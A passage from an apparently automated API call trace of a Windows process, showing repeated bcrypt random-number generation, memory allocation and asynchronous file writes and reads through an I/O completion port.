lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.588] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.590] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.590] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.590] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.591] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.591] free (_Block=0x3e305b8) [0175.591] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.591] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.592] free (_Block=0x1fa91d0) [0175.592] free (_Block=0x1fa2ed8) [0175.592] free (_Block=0x1fa90b8) [0175.592] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.602] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.612] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.613] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.613] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.613] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.614] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.614] free (_Block=0x3e305b8) [0175.614] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.614] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.614] free (_Block=0x1fa91d0) [0175.614] free (_Block=0x1fa2ed8) [0175.614] free (_Block=0x1fa90b8) [0175.614] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.620] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.631] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.631] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.639] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.639] free (_Block=0x3e305b8) [0175.639] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.639] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.639] free (_Block=0x1fa91d0) [0175.639] free (_Block=0x1fa2ed8) [0175.639] free (_Block=0x1fa90b8) [0175.639] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.640] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.642] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.642] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.642] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.642] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.642] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.642] free (_Block=0x3e305b8) [0175.642] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.642] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.643] free (_Block=0x1fa91d0) [0175.643] free (_Block=0x1fa2ed8) [0175.643] free (_Block=0x1fa90b8) [0175.643] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.643] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.644] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x5010, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.663] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.663] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.663] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.664] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.664] free (_Block=0x3e305b8) [0175.664] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.664] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.665] free (_Block=0x1fa91d0) [0175.665] free (_Block=0x1fa2ed8) [0175.665] free (_Block=0x1fa90b8) [0175.665] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.676] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.677] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.677] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.677] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.678] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.678] free (_Block=0x3e305b8) [0175.678] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.678] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.679] free (_Block=0x1fa91d0) [0175.679] free (_Block=0x1fa2ed8) [0175.679] free (_Block=0x1fa90b8) [0175.679] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.680] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.689] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.689] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.689] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.689] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.690] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.690] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.690] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.690] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.690] free (_Block=0x3e305b8) [0175.690] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.690] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.691] free (_Block=0x1fa91d0) [0175.691] free (_Block=0x1fa2ed8) [0175.691] free (_Block=0x1fa90b8) [0175.691] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.692] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.702] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.702] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.702] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.703] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.703] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.704] free (_Block=0x3e305b8) [0175.704] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.704] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.704] free (_Block=0x1fa91d0) [0175.704] free (_Block=0x1fa2ed8) [0175.704] free (_Block=0x1fa90b8) [0175.704] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.706] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.712] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.712] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.712] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.713] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.713] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.713] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.713] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.713] free (_Block=0x3e305b8) [0175.713] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.713] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.714] free (_Block=0x1fa91d0) [0175.714] free (_Block=0x1fa2ed8) [0175.714] free (_Block=0x1fa90b8) [0175.714] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.715] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.729] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.729] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.730] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.730] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.730] free (_Block=0x3e305b8) [0175.730] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.730] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.731] free (_Block=0x1fa91d0) [0175.731] free (_Block=0x1fa2ed8) [0175.731] free (_Block=0x1fa90b8) [0175.731] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.732] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.749] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.750] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.750] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.751] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.751] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.751] free (_Block=0x3e305b8) [0175.751] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.751] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.751] free (_Block=0x1fa91d0) [0175.751] free (_Block=0x1fa2ed8) [0175.751] free (_Block=0x1fa90b8) [0175.751] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.763] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.764] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.764] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.764] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.764] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.765] free (_Block=0x3e305b8) [0175.765] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.765] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.765] free (_Block=0x1fa91d0) [0175.765] free (_Block=0x1fa2ed8) [0175.765] free (_Block=0x1fa90b8) [0175.765] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.777] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.777] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.777] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.778] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.778] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.778] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.778] free (_Block=0x3e305b8) [0175.778] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.778] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.779] free (_Block=0x1fa91d0) [0175.779] free (_Block=0x1fa2ed8) [0175.779] free (_Block=0x1fa90b8) [0175.779] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.784] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.784] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.784] free (_Block=0x3e305b8) [0175.784] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.784] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.784] free (_Block=0x1fa91d0) [0175.784] free (_Block=0x1fa2ed8) [0175.784] free (_Block=0x1fa90b8) [0175.784] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0175.786] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.918] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.918] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.918] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0175.919] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.919] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.919] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0175.919] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0175.919] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0175.919] free (_Block=0x3e305b8) [0175.919] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0175.919] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0175.920] free (_Block=0x1fa91d0) [0175.920] free (_Block=0x1fa2ed8) [0175.920] free (_Block=0x1fa90b8) [0175.920] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0175.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.921] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0175.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.925] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x41c2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0175.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0175.945] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3fe8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: 